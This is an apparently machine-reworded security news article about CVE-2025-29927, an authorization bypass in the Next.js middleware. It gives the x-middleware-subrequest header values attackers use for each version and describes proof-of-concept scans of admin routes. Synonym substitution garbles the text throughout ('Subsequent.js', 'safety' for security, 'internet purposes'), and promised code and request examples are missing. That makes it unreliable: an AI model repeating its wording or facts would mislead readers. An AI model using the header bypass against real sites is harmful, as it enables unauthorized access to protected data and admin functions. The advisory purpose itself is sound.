A newly found important safety vulnerability within the Subsequent.js framework, designated CVE-2025-29927, poses a major menace to internet purposes by permitting malicious actors to fully bypass authorization mechanisms.
This vulnerability arises from improper dealing with of the x-middleware-subrequest header inside Subsequent.js middleware execution, probably exposing delicate administrative areas and guarded sources to unauthorized entry.
The vulnerability impacts a number of variations of the favored React-based internet framework, with completely different exploitation strategies relying on the precise model in use.
Key Takeaways1. CVE-2025-29927 exploits x-middleware-subrequest to bypass Subsequent.js authorization.2. Attackers set the header to middleware names to skip checks.3. Grants unauthorized entry, so implement layered safety.
Safety researchers have demonstrated that attackers can manipulate HTTP headers to avoid authentication and authorization controls, having access to restricted areas with out correct credentials.
Subsequent.js Framework Vulnerability
NullSecurityX reviews that the core of this vulnerability lies in Subsequent.js’s middleware processing logic, particularly the way it handles the x-middleware-subrequest header.
This header was initially designed to forestall infinite middleware loops by figuring out inside subrequests. Nonetheless, flawed implementation permits exterior requests to abuse this mechanism.
The weak code sample follows this construction:
When an attacker contains the suitable x-middleware-subrequest header worth of their HTTP request, the middleware incorrectly identifies it as an inside subrequest and skips authorization checks fully. The exploitation varies throughout Subsequent.js variations:
Model 12.2 and Earlier: Attackers use x-middleware-subrequest: pages/_middleware to bypass middleware situated within the pages listing.
Model 12.2 and Later: The header worth modifications to x-middleware-subrequest: middleware for middleware information named middleware.ts.
Model 13.2.0 and Later: Regardless of recursion depth protections, the elemental vulnerability persists by repeated middleware names within the header.
Sensible exploitation situations exhibit the severity of this vulnerability. Attackers can craft easy HTTP requests to entry protected administrative panels.
This request bypasses middleware safety and grants unauthorized entry to admin performance.
The vulnerability turns into notably harmful when mixed with JSON Internet Token (JWT) or cookie-based authentication programs, the place the header manipulation permits full circumvention of token validation.
Automated exploitation instruments can systematically check a number of protected routes concurrently.
Danger FactorsDetailsAffected ProductsNext.js variations ≤ 12.2 (pages/_middleware)Subsequent.js variations ≥ 12.2 and ImpactComplete authorization bypass through middleware skipExploit PrerequisitesAbility to craft HTTP requests with customized x-middleware-subrequest headerCVSS 3.1 Score9.8 (Crucial)
Safety researchers have developed proof-of-concept scripts that iterate by widespread administrative endpoints (/admin, /dashboard, /settings) whereas injecting the malicious header, shortly figuring out weak entry factors throughout whole purposes.
The vulnerability’s impression extends past easy authorization bypass. In purposes that rely solely on Subsequent.js middleware for safety controls, attackers can probably entry delicate consumer knowledge, modify software configurations, or execute administrative capabilities with out correct authentication.
Organizations working Subsequent.js purposes ought to instantly assess their middleware implementations and apply obtainable safety patches.
This discovery highlights the important significance of defense-in-depth safety methods, the place authorization controls exist at a number of software layers somewhat than relying solely on middleware-based safety mechanisms.
Discover this Story Attention-grabbing! Observe us on Google Information, LinkedIn, and X to Get Extra Prompt Updates.
